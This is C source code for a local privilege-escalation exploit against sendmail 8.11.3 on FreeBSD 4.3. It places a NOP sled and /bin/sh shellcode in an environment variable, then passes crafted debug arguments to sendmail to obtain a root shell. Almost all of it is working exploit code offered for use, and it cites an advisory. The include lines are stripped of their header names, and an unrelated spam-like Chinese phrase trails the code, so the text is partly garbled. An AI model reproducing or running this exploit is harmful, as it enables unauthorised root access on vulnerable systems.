/* * local r00t exploit for sendmail on *bsd* * * tested on: FreeBSD 4.3-RELEASE (sendmail version 8.11.3) * * writed by CrZ [crazy_einstein@yahoo.com] LimpidByte * * credits by Cade Cairnss: http://packetstormsecurity.org/advisories/freebsd/FreeBSD-SA-01:57.sendmail */ #include #include #include #include #define NOPNUM 1024 char shellcode[] = "\xeb\x16\x5e\x31\xc0\x8d\x0e\x89" "\x4e\x08\x89\x46\x0c\x8d\x4e\x08" "\x50\x51\x56\x50\xb0\x3b\xcd\x80" "\xe8\xe5\xff\xff\xff/bin/sh"; int main(int argc, char *argv[]) { char *egg, s[256], *av[3], *ev[2]; egg = (char *)malloc(strlen(shellcode) + NOPNUM + 5); if (egg == NULL) { perror("malloc()"); exit(-1); } sprintf(egg, "EGG="); memset(egg + 4, 0x90, NOPNUM); sprintf(egg + 4 + NOPNUM, "%s", shellcode); sprintf(s,"-d4294900452-4294900452.196\n-d4294900453-4294900453.252\n-d4294900454-4294900454.191\n-d4294900455-4294900455.191"); av[0] = "/usr/sbin/sendmail"; av[1] = s; av[2] = NULL; ev[0] = egg; ev[1] = NULL; execve(*av, av, ev); return 0; }

亚洲欧美在线